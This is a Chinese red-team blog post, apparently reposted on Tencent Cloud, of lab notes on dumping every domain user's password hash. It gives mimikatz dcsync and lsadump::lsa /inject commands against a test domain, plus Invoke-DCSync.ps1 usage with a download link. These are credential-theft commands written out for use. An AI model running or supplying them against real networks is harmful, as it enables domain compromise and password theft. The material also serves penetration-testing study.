专栏首页漏洞知识库利用 dcsync 获取域内所有用户哈希值

利用 dcsync 获取域内所有用户哈希值

大家好,这里是 渗透攻击红队 的第 34 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

dcsync 获取域内用户哈希值

mimikatz 转储哈希值

mimikatz 有一个 dcsync 功能,可以利用卷影拷贝服务直接读取 ntds.dit 文件并检索域散列值。

前提必须使用管理员权限运行 mimikatz 才可以读取 ntds.dit。

在域内任意一台主机,以域管理员权限执行命令:

lsadump::dcsync /domain:god.org /all /csv

使用 mimikatz 的 dcsync 功能也可以导出指定用户的散列值,导出用户 mary 的散列值:

lsadump::dcsync /domain:god.org /user:mary

通过转储 lsass.exe 进程对散列值进行 Dump 操作:(导出域内所有账号和域散列值)

privilege::debug
log
lsadump::lsa /inject

如果 mimikatz 没有预先执行 privilege::debug 命令,将导致权限不足、读取失败。如果用户数量太多,mimikatz 无法完全显示出来,可以先执行 log(会在mimikatz目录下生成一个文本文件,用于记录mimikatz的所有执行结果)


powershell dcsync 获取域内用户哈希值

Invoke-DCSync.ps1 可以利用 dcsync 直接读取 ntds.dit,以获取域账号和域散列值。

下载地址:https://gist.github.com/monoxgas/9d238accd969550136db

Import-Module .\Invoke-DCSync.ps1
Invoke-DCSync -PWDumpFormat

本文分享自微信公众号 - 渗透攻击红队(RedTeamHacker),作者:渗透攻击红队

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-11-27

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 使用 Metasploit 获取哈希或域内哈希值

    大家好,这里是 渗透攻击红队 的第 35 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

    渗透攻击红队
  • 内网渗透测试:DCSync 攻击技术的利用研究

    在域环境中,不同域控制器(DC)之间,每 15 分钟都会有一次域数据的同步。当一个域控制器(DC 1)想从其他域控制器(DC 2)获取数据时,DC 1 会向 D...

    FB客服
  • 白银票据(Silver Ticket)攻击

    大家好,这里是 渗透攻击红队 的第 38 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

    渗透攻击红队
  • 导出域内用户hash的几种方法

    在渗透测试期间,可以利用域管权限对域内用户hash进行导出和破解。这些域内用户hash存储在域控制器(NTDS.DIT)中的数据库文件中,并带有一些其他信息,如...

    Jumbo
  • 内网渗透测试研究:从NTDS.dit获取域散列值

    本文我们将演示如何获取域控制器上的Ntds.dit文件并提取其中的域账户和密码哈希。

    FB客服
  • 抓取域密码哈希的各种工具集合

    在拿到域管理员权限之后,都会提取所有域用户的密码哈希进行离线破解和分析。这些密码哈希存储在域控制器(NTDS.DIT)中的数据库文件中,并包含一些附加信息,如组...

    信安之路
  • 内网渗透基石篇之域控制器

    在通常情况下,即使拥有管理员权限,也无法读取域控制器中的ndts.dit文件,但是我们又非常想获得这个文件的内容,这个时候就需要使用windows本地卷影拷贝服...

    FB客服
  • 获取局域网内所有用户和IP

    @echo off&setlocal enabledelayedexpansion title 获取局域网内所有用户 echo winxp 英文版...

    似水的流年
  • 获取局域网内所有用户和IP

    似水的流年
  • 利用BloodHound与Impacket进行域渗透实战

    域渗透对于初学者来说,主要难点在于涉及域的基础理论知识较多,比如ACL访问控制、DcSync权限、黄金票据、白银票据、Access Token、哈希传递等等。

    FB客服
  • 红队笔记 - 横向移动

    我们需要具有 ACL 写入权限才能为目标用户设置 UserAccountControl 标志,请参阅上文以识别有趣的 ACL。使用 PowerV...

    Khan安全团队
  • 我所了解的内网渗透 - 内网渗透知识大总结

    一般想知道哪一台是域控知道自己内网的DNS就可以了,一般域控安装都有安装DNS有些不止一台,其次是通过扫描获取开放端口为389机器或者使用NLTEST命令查看。...

    HACK学习
  • 细数微软Exchange的那些高危漏洞

    今天,多个安全厂家都发布了微软Exchange多个高危漏洞的通告,涉及漏洞编号CVE-2021-26855、CVE-2021-26857、CVE-2021-26...

    Bypass
  • 内网横向移动思路和技巧

    攻击者借助跳板机进一步入侵内网服务器后,接着会通过各种方式来获取目标系统权限,获取用户的明文密码或Hash值在内网中横向移动。

    Bypass
  • 内网协议NTLM之内网大杀器CVE-2019-1040漏洞

    Preempt的研究人员发现了如何在NTLM身份验证上绕过MIC(Message Integrity Code)保护措施并修改NTLM消息流中的任何字段(包括签...

    黑白天安全
  • 内网渗透(四) | 票据传递攻击

    票据传递攻击(PtT)是基于Kerberos认证的一种攻击方式,常用来做后渗透权限维持。黄金票据攻击利用的前提是得到了域内krbtgt用户的NTLM 哈希或AE...

    Ms08067安全实验室
  • CS学习笔记 | 18、密码哈希散列设置信任

    继续上一节密码哈希的部分,在上一节中讲到了使用密码生成用户的令牌,从而取得系统的信任,这一节将介绍使用密码的哈希值来取得系统的信任。

    TeamsSix
  • 利用ProxyShell漏洞获取域控所有Hash

    CVE-2021-34523:在 Exchange PowerShell 后台的提权漏洞

    小生观察室
  • 投稿 | 使用Exchange服务器中的Writedacl实现域提权的提权

    在域环境中,如果安装Exchange后,系统会添加一个名为Microsoft Exchange Security Groups、Exchange Trusted...

    Ms08067安全实验室

扫码关注云+社区

领取腾讯云代金券